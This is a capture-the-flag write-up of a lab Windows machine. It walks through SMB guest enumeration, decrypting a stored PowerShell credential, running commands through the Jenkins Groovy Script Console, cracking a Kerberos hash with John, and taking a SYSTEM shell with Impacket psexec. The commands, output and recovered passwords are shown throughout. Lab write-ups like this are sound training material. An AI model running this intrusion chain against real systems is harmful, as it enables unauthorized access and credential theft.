This machine was more about enumeration and privilege escalation. From a public smb share to NT\Authority System.  



In order to hack this machine, we should know what ports are open and we can do that by using a popular tool such as Nmap.

→ nmap -sC -sV -oN scan -Pn

-sC Use default scripts -sV Probe open ports to determine service/version info -oN Save output in nmap format. -Pn Treat all hosts as online  

Nmap scan report for
Host is up (0.012s latency).
Not shown: 996 filtered ports
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: WORKGROUP)
8080/tcp open  http         Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: Host: WIN-V1LSDDMFJH2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h38m47s, deviation: 4h37m09s, median: -1m14s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: WIN-V1LSDDMFJH2
|   NetBIOS computer name: WIN-V1LSDDMFJH2\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-03T04:46:15-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-03T12:46:12
|_  start_date: 2020-01-31T10:09:47


From the nmap output we can see that Jenkins is running on port 8080 and it’s vulnerable to remote code execution if we can log into it but common credentials such as admin:admin didn’t work. So we will continue enumeration on port 445 and see if we can login with a Guest user.

→ smbmap -H -u Guest

[+] Finding open SMB ports....
[+] User SMB session established on
[+] IP:	Name:                                       
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	erik_stuff                                        	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	Users                                             	READ ONLY	


From the smbmap output we can see that Guest user has read access on some specific shares, Erik must be a user on this machine so we will continue searching for files on erik_stuff share.

→ smbmap -H -u Guest -r erik_stuff

[+] Finding open SMB ports....
[+] User SMB session established on
[+] IP:	Name:                                       
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	erik_stuff                                        	READ ONLY	
	dr--r--r--                0 Mon Jan 13 16:58:16 2020	.
	dr--r--r--                0 Mon Jan 13 16:58:16 2020	..
	fr--r--r--              926 Mon Jan 13 16:58:16 2020	encrypted_password.txt
	fr--r--r--              523 Mon Jan 13 16:58:16 2020	script.ps1


We can download these files with the --download parameter.

→ smbmap -H -u Guest --download ‘erik_stuff\encrypted_password.txt’

[+] File output to: /home/arbenn/

→ smbmap -H -u Guest --download ‘erik_stuff\script.ps1’

[+] File output to: /home/arbenn/  

→ cat encrypted_password.txt


→ cat script.ps1

# PS1 script to start jenkins as local user
# User and Password as cli argument
$username = "erik"
$erikpass = Get-Content "encrypted_password.txt" | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential($username,$erikpass)

# To Do
$srvName = "Jenkins"
$servicePrior = Get-Service $srvName
"$srvName is now " + $servicePrior.status
Set-Service $srvName -startuptype manual
Restart-Service $srvName
$serviceAfter = Get-Service $srvName
"$srvName is now " + $serviceAfter.status%  


It seems that script.ps1 is trying to start Jenkins as user Erik but what’s vulnerable here it’s that is using the password stored in encrypted_password.txt. We have earlier downloaded this file so we can easily decrypt it using powershell.  


$password = Get-Content "encrypted_password.txt" | ConvertTo-SecureString
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)



After decrypting the password to clear text with powershell which resulted to \4Eb]y, we can then use it to log into Jenkins as an admin user.



We are going to use the Script Console plugin since we can execute arbitrary Groovy scripts with it.


After some enumration on the target machine we found an important file located on Erik’s desktop.  

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "cmd /c dir c:\\Users\\erik\\Desktop\\old_stuff".execute()
proc.consumeProcessOutput(sout, serr)
println "$sout"


def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "cmd /c type c:\\Users\\erik\\Desktop\\old_stuff\\administrator.hash".execute()
proc.consumeProcessOutput(sout, serr)
println "$sout"



→ cat administrator.hash



This looks like a Kerbreos hash which was previously extracted with from Impacket. Lucky for us we can decrypt this using John and later use it as an Administrator password.

→ john administrator.hash –wordlist=~/tools/SecLists/Passwords/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
No password hashes left to crack (see FAQ)                                              
1 password hash cracked, 0 left

→ python2 Administrator:’Ticketmaster1968’@

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file uZIDWCrQ.exe
[*] Opening SVCManager on
[*] Creating service sgda on
[*] Starting service sgda.....
[!] Press help for extra shell commands                                                                         Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami                                                                                      nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt.txt                                            XOR{6e1773e7187824ec9458dbb4dda3f4139f4e241a}

Machine created by:


  I hope you had fun solving this machine and learning something new.